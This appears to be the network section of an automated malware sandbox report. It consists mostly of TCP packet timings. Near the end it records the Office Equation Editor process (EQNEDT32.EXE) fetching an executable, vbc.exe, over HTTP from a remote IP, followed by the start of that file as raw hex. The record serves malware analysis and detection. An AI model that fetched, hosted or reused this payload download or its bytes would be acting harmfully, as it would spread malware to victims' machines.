Nov 25, 2021 19:05:28.680670023 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680672884 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680685997 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680692911 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680712938 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680715084 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680732012 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680737019 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680748940 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680757999 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680773020 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680779934 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680792093 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680799961 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680819035 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680820942 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680836916 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680841923 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680860996 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680877924 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680891991 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680900097 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680922031 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680922985 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680943966 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680948019 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680964947 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.680978060 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680984974 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.680989027 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681010008 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681011915 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681031942 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681035042 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681046963 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681055069 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681077003 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681077003 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681097984 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681101084 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681112051 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681119919 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681140900 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681142092 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681154966 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681164980 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681185007 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681194067 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681206942 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681211948 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681229115 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681230068 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.681242943 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.681271076 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.687493086 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.786802053 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786832094 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786844969 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786858082 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786874056 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786890030 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786905050 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786922932 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786938906 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786955118 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786972046 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786972046 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.786988020 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.786995888 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.786998987 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787004948 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787015915 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787020922 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787029982 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787038088 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787050009 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787054062 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787059069 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787070036 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787075043 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787086964 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787091017 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787102938 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787106991 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787118912 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787134886 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787136078 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787144899 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787152052 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787156105 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787168026 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787175894 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787184000 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787199974 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787201881 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787206888 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787215948 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787215948 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787231922 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787245035 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787249088 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787251949 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787266970 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787275076 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787282944 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787286043 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787298918 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787307978 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787313938 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787317991 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787331104 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787338972 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787347078 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787350893 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787363052 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787370920 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787379026 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787384033 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787398100 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787400961 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787416935 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787416935 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787434101 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787435055 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787450075 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787452936 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787465096 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787467957 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787481070 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787486076 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787497997 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787504911 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787513971 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787527084 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787533998 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787540913 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787548065 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787558079 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787570000 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787585974 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787594080 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787599087 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787601948 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787619114 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787626982 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787636042 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787637949 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787652969 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787662029 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787668943 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787672997 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787684917 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787693024 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787700891 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787708044 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787715912 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787729025 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787733078 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787741899 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787750006 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787759066 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787766933 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787777901 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787784100 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.787782907 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787813902 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.787820101 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.788399935 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.788423061 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.788471937 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.788484097 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.788505077 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.788528919 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.788543940 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.791054964 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797456980 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797488928 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797588110 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797614098 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797629118 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797641039 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797655106 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797658920 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797668934 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797683954 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797694921 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797719002 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797722101 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797741890 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797759056 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797784090 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797811031 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797837973 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797837019 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797849894 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797852993 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797854900 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797863960 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797888994 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797892094 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797909975 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797919035 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797938108 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797945023 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797964096 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797971964 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.797993898 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.797997952 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798000097 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798024893 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798038006 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798052073 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798055887 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798077106 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798089027 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798104048 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798108101 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798131943 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798141003 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798156977 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798168898 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798183918 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798188925 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798209906 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798222065 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798237085 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798249006 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798266888 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798275948 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798293114 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798306942 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798316956 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798319101 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798346996 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798372984 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798374891 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798388958 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798404932 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798444033 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798468113 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798470974 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798475027 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798480988 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798496962 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798522949 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798532963 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798537016 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798549891 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798561096 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798577070 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798588037 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798604965 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798615932 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798630953 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798643112 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798656940 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798666000 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798683882 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798693895 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798708916 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798721075 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798736095 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798748016 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798763037 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798774004 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798789024 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798799038 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798818111 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798826933 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798854113 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798856020 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798880100 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798899889 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798907042 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798916101 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798933983 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798945904 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798959970 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798970938 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.798986912 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.798996925 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.799012899 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.799024105 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.799041033 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.799053907 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.799068928 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.799078941 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.799094915 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.799108982 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.799120903 CET	80	49165	198.12.91.205	192.168.2.22
Nov 25, 2021 19:05:28.799130917 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.799159050 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:28.808774948 CET	49165	80	192.168.2.22	198.12.91.205
Nov 25, 2021 19:05:29.850507975 CET	49165	80	192.168.2.22	198.12.91.205

HTTP Request Dependency Graph

198.12.91.205

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	198.12.91.205	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 19:05:27.750633955 CET	0	OUT	GET /50005/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.12.91.205 Connection: Keep-Alive
Nov 25, 2021 19:05:27.867245913 CET	1	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 18:05:27 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 Last-Modified: Thu, 25 Nov 2021 03:22:49 GMT ETag: "b7200-5d1947d38df57" Accept-Ranges: bytes Content-Length: 750080 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 01 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 66 0b 00 00 0a 00 00 00 00 00 00 72 85 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 85 0b 00 4f 00 00 00 00 a0 0b 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 65 0b 00 00 20 00 00 00 66 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 0b 00 00 08 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 70 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 85 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 54 21 01 00 03 00 00 00 8c 01 00 06 00 6a 02 00 20 1b 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 